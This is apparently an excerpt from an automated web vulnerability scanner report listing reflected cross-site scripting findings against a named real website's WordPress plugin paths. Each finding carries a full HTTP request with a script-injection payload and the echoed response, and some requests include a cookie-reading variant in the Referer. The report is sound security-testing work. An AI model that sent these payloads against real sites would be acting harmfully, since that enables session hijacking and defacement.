GET /wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.jscaf20"><script>alert(1)</script>4eec3538e5e HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:18:49 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:18:51 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.jscaf20\"><script>alert(1)</script>4eec3538e5e" type="hidden" />
...[SNIP]...

1.177. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d752a"><script>alert(1)</script>cab60ad3b7f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d752a\"><script>alert(1)</script>cab60ad3b7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js?d752a"><script>alert(1)</script>cab60ad3b7f=1 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:15:56 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Mon, 31 Jan 2011 20:15:56 GMT
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js?d752a\"><script>alert(1)</script>cab60ad3b7f=1" type="hidden" />
...[SNIP]...

1.178. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da531"><script>alert(1)</script>024e2ce4755 was submitted in the REST URL parameter 1. This input was echoed as da531\"><script>alert(1)</script>024e2ce4755 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /da531"><script>alert(1)</script>024e2ce4755/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:18:05 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:18:06 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/da531\"><script>alert(1)</script>024e2ce4755/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2" type="hidden" />
...[SNIP]...

1.179. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d84c"><script>alert(1)</script>bd0d34dbf9f was submitted in the REST URL parameter 2. This input was echoed as 2d84c\"><script>alert(1)</script>bd0d34dbf9f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins2d84c"><script>alert(1)</script>bd0d34dbf9f/sexybookmarks/js/shareaholic-publishers.min.js/page/2 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:18:38 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:18:38 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47467

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins2d84c\"><script>alert(1)</script>bd0d34dbf9f/sexybookmarks/js/shareaholic-publishers.min.js/page/2" type="hidden" />
...[SNIP]...

1.180. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f8ee"><script>alert(1)</script>455db0072e6 was submitted in the REST URL parameter 3. This input was echoed as 1f8ee\"><script>alert(1)</script>455db0072e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarks1f8ee"><script>alert(1)</script>455db0072e6/js/shareaholic-publishers.min.js/page/2 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:19:10 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:19:11 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47467

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks1f8ee\"><script>alert(1)</script>455db0072e6/js/shareaholic-publishers.min.js/page/2" type="hidden" />
...[SNIP]...

1.181. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1bd8"><script>alert(1)</script>5954009ca3e was submitted in the REST URL parameter 4. This input was echoed as f1bd8\"><script>alert(1)</script>5954009ca3e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarks/jsf1bd8"><script>alert(1)</script>5954009ca3e/shareaholic-publishers.min.js/page/2 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:19:34 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:19:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47467

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks/jsf1bd8\"><script>alert(1)</script>5954009ca3e/shareaholic-publishers.min.js/page/2" type="hidden" />
...[SNIP]...

1.182. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9136f"><script>alert(1)</script>3ea9e8dbbbd was submitted in the REST URL parameter 5. This input was echoed as 9136f\"><script>alert(1)</script>3ea9e8dbbbd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js9136f"><script>alert(1)</script>3ea9e8dbbbd/page/2 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:19:57 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:19:58 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47467

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js9136f\"><script>alert(1)</script>3ea9e8dbbbd/page/2" type="hidden" />
...[SNIP]...

1.183. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c54c"><script>alert(1)</script>11551064c28 was submitted in the REST URL parameter 6. This input was echoed as 2c54c\"><script>alert(1)</script>11551064c28 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page2c54c"><script>alert(1)</script>11551064c28/2 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:20:20 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:20:21 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page2c54c\"><script>alert(1)</script>11551064c28/2" type="hidden" />
...[SNIP]...

1.184. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2 [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aff04"><script>alert(1)</script>5685fddf53f was submitted in the REST URL parameter 7. This input was echoed as aff04\"><script>alert(1)</script>5685fddf53f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2aff04"><script>alert(1)</script>5685fddf53f HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:20:28 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:20:29 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2aff04\"><script>alert(1)</script>5685fddf53f" type="hidden" />
...[SNIP]...

1.185. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a97b2"><script>alert(1)</script>481e6eac7c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a97b2\"><script>alert(1)</script>481e6eac7c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2?a97b2"><script>alert(1)</script>481e6eac7c6=1 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:17:11 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Mon, 31 Jan 2011 20:17:12 GMT
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47505

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2?a97b2\"><script>alert(1)</script>481e6eac7c6=1" type="hidden" />
...[SNIP]...

1.186. http://www.installsoftware.com/wp-content/plugins/wp-followme/flash/wp_followme.swf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/wp-followme/flash/wp_followme.swf

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ee8e"><script>alert(1)</script>7e220eebda7 was submitted in the REST URL parameter 1. This input was echoed as 7ee8e\"><script>alert(1)</script>7e220eebda7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content7ee8e"><script>alert(1)</script>7e220eebda7/plugins/wp-followme/flash/wp_followme.swf HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.1.10.1296503863

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:20:44 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 20:20:45 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44395

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content7ee8e\"><script>alert(1)</script>7e220eebda7/plugins/wp-followme/flash/wp_followme.swf" type="hidden" />
...[SNIP]...

1.187. http://www.installsoftware.com/wp-content/plugins/wp-followme/flash/wp_followme.swf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/wp-followme/flash/wp_followme.swf

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfa90"><script>alert(1)</script>4eaf9ab9417 was submitted in the REST URL parameter 2. This input was echoed as bfa90\"><script>alert(1)</script>4eaf9ab9417 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginsbfa90"><script>alert(1)</script>4eaf9ab9417/wp-followme/flash/wp_followme.swf HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.1.10.1296503863

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:20:54 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 20:20:55 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44395

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/pluginsbfa90\"><script>alert(1)</script>4eaf9ab9417/wp-followme/flash/wp_followme.swf" type="hidden" />
...[SNIP]...

1.188. http://www.installsoftware.com/wp-content/plugins/wp-followme/flash/wp_followme.swf [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/wp-followme/flash/wp_followme.swf

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64678"><script>alert(1)</script>1b810eecd7d was submitted in the REST URL parameter 3. This input was echoed as 64678\"><script>alert(1)</script>1b810eecd7d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wp-followme64678"><script>alert(1)</script>1b810eecd7d/flash/wp_followme.swf HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.1.10.1296503863

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:20:59 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
